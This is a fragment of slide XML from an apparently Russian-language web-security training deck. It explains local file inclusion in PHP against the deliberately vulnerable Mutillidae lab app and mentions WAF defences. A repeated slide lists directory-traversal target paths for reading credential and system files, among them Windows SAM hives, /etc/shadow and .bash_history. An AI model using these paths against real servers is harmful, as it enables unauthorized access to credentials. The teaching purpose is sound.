                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>использовать средства защиты веб-приложений, например, WAF, который будет блокировать вредоносный запрос, не позволяя его выполнить на веб-сервере.</a:t>
            </a:r>
          </a:p>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3678991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https://xakep.ru/2009/09/17/49508/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://xakep.ru/2011/07/03/55787/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD2200"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD2200"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>raz0r.name/articles/null-byte-alternative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue"/>
              </a:rPr>
              <a:t>подробно об альтернативе</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue"/>
              </a:rPr>
              <a:t>нулл</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="HelveticaNeue"/>
              </a:rPr>
              <a:t>-байту.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Номер слайда 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80EA2E60-5E3E-4AAB-B5EC-6CA89797E6E9}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1580104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a:t>Локальное включение файлов (LFI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> эксплуатируется путем включения пути к файлу в URL-адрес, указывающий на локальный веб-сервер, на котором размещено веб-приложение. Эта уязвимость при эксплуатации позволяет внедрить символы обхода каталога (такие как точка-точка-слэш). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>PHP работает под учетной записью (как и любой другой пользователь). Учетная запись имеет привилегии в локальной файловой системе с возможностью чтения, записи и/или выполнения файлов. В идеале учетная запись должна иметь достаточно привилегий только для выполнения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>-файлов в определенной, предназначенной для этого директории, но, к сожалению, часто это не так. Локальное включение файлов происходит, когда файл, к которому имеет доступ учетная запись PHP, передается в качестве параметра функции PHP "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" или "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>". PHP включает содержимое в страницу. Если содержимое является исходным кодом PHP, PHP выполняет файл</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>Методология обнаружения</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Страница, отображаемая в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, определяется значением параметра "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>". Что произойдет, если параметр "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" будет изменен на имя файла, который находится на сервере, но не предназначен для обслуживания? Этот дефект может быть объединен с другими дефектами. Например, параметр "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" может быть передан как через GET, так и через POST благодаря дефекту опроса параметров. Использование оператора обхода родителя ("...") может помочь вырваться из файловых папок веб-сервера. Также можно попробовать использовать прямые пути к файлам. Например, если </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> работает на системе Windows XP, можно попробовать следующие значения для "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\boot.ini ..\..\..\..\boot.ini %SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\repair\system %WINDIR%\repair\software %WINDIR%\repair\security %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day) %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AppEvent.Evt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecEvent.Evt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>default.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>security.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>software.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>system.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\hosts </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On Linux machines try the following. The web server root may be several directories down from the system root. Be sure to prefix the file names with directory traversal (i.e. - ../../..).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>motd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/issue /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/shadow /home/xxx/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/issue{,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>master.passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/group /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/hosts /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/crontab /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysctl.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syslog.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chttp.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lighttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cups/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cupsd.confcda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ldap.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ldap.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/exports /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auto.master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auto_master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62528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a:t>Локальное включение файлов (LFI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> эксплуатируется путем включения пути к файлу в URL-адрес, указывающий на локальный веб-сервер, на котором размещено веб-приложение. Эта уязвимость при эксплуатации позволяет внедрить символы обхода каталога (такие как точка-точка-слэш). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>PHP работает под учетной записью (как и любой другой пользователь). Учетная запись имеет привилегии в локальной файловой системе с возможностью чтения, записи и/или выполнения файлов. В идеале учетная запись должна иметь достаточно привилегий только для выполнения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>-файлов в определенной, предназначенной для этого директории, но, к сожалению, часто это не так. Локальное включение файлов происходит, когда файл, к которому имеет доступ учетная запись PHP, передается в качестве параметра функции PHP "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" или "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>". PHP включает содержимое в страницу. Если содержимое является исходным кодом PHP, PHP выполняет файл</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>Методология обнаружения</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Страница, отображаемая в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, определяется значением параметра "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>". Что произойдет, если параметр "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" будет изменен на имя файла, который находится на сервере, но не предназначен для обслуживания? Этот дефект может быть объединен с другими дефектами. Например, параметр "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" может быть передан как через GET, так и через POST благодаря дефекту опроса параметров. Использование оператора обхода родителя ("...") может помочь вырваться из файловых папок веб-сервера. Также можно попробовать использовать прямые пути к файлам. Например, если </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> работает на системе Windows XP, можно попробовать следующие значения для "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\boot.ini ..\..\..\..\boot.ini %SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\repair\system %WINDIR%\repair\software %WINDIR%\repair\security %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day) %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AppEvent.Evt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecEvent.Evt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>default.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>security.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>software.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %WINDIR%\system32\config\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>system.sav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
